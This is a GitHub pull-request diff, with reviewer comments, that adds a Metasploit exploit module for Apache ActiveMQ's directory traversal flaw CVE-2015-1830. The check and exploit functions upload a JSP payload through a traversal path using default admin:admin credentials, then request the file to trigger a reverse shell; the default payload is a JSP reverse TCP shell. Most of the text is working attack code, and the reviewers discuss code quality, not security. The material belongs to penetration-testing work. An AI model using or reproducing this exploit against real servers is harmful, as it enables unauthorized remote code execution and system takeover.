Add apache_activemq_traversal_upload module to /modules/exploits/windows/http/ #12910
@@ -4,20 +4,25 @@ | |
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = NormalRanking | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Apache ActiveMQ directory traversal shell upload', | ||
'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload', | ||
'Description' => %q{ | ||
This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default credentials admin:admin. It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell. | ||
@kalba-security If you could just split this description up a bit, I think that's the last thing and then I'd be good to land it.
Done! @dwelch-r7 |
||
}, | ||
'Author' => 'Erik Wynter', #@wyntererik | ||
'Author' => | ||
[ | ||
'David Jorm', # Discovery and exploit | ||
'Erik Wynter' # @wyntererik - Metasploit | ||
], | ||
'References' => | ||
[ | ||
[ 'CVE', '2015-1830' ], | ||
[ 'EDB', '40857'], | ||
[ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ] | ||
], | ||
'Privileged' => false, | ||
|
@@ -33,24 +38,27 @@ def initialize(info = {}) | |
], | ||
'DisclosureDate' => 'Aug 19 2015', | ||
'License' => MSF_LICENSE, | ||
'DefaultOptions' => { | ||
'RPORT' => 8161, | ||
'PAYLOAD' => 'java/jsp_shell_reverse_tcp' | ||
}, | ||
'DefaultTarget' => 0)) | ||
|
||
register_options([ | ||
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), | ||
OptString.new('PATH', [true, 'Traversal path', '/fileserver/..\\admin\\']), | ||
Opt::RPORT(8161), | ||
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), | ||
OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin']) | ||
]) | ||
end | ||
|
||
def check | ||
print_status("loaded check") | ||
testurl = Rex::Text::rand_text_alpha(10) | ||
def check | ||
print_status("Running check...") | ||
testfile = Rex::Text::rand_text_alpha(10) | ||
testcontent = Rex::Text::rand_text_alpha(10) | ||
|
||
send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testurl}.jsp"), | ||
'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"), | ||
'headers' => { | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
}, | ||
|
@@ -59,7 +67,7 @@ def check | |
}) | ||
|
||
res1 = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"), | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), | ||
'headers' => { | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
}, | ||
|
@@ -69,7 +77,7 @@ def check | |
if res1 && res1.body.include?(testcontent) | ||
send_request_cgi( | ||
opts = { | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"), | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), | ||
'headers' => { | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
}, | ||
|
@@ -85,11 +93,11 @@ def check | |
|
||
def exploit | ||
print_status("Uploading payload...") | ||
testurl = Rex::Text::rand_text_alpha(10) | ||
vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testurl}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails. | ||
testfile = Rex::Text::rand_text_alpha(10) | ||
vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails. | ||
|
||
res = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testurl}.jsp"), | ||
send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"), | ||
'headers' => { | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
}, | ||
|
@@ -98,14 +106,14 @@ def exploit | |
}) | ||
|
||
print_status("Payload sent. Attempting to execute the payload.") | ||
res1 = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"), | ||
res = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), | ||
'headers' => { | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
}, | ||
'method' => 'GET' | ||
}) | ||
if res1 && res1.code == 200 | ||
if res && res.code == 200 | ||
print_good("Payload executed!") | ||
else | ||
fail_with(Failure::PayloadFailed, "Failed to execute the payload") | ||
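Review bot: RPORT is now declared twice in initialize — once in the added `'DefaultOptions'` hash (`'RPORT' => 8161`) and again in the unchanged `Opt::RPORT(8161)` entry of register_options a few lines below — so the two values can drift apart on a later edit; keep `Opt::RPORT(8161)` and drop the `'RPORT' => 8161,` line from DefaultOptions. Related, `PATH` is a user-settable option whose default ends in `admin\\`, yet every retrieval URI in the check and exploit hunks hardcodes `"admin/#{testfile}.jsp"`, so a non-default PATH would write to one location and then probe another; either derive the second path from PATH or state in the option description that PATH must resolve to the web application's `admin` directory. Separately, in the check hunk the third request is written as `send_request_cgi(opts = { ... })`, which assigns a local `opts` that is never read; it should be a plain hash argument. initialize starts in the first hunk and ends in this section's second hunk, while check and exploit both continue outside their hunks.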
|
It might be unclear to a reader as to what these options actually do. Add a short description to each option (as well as state the default value).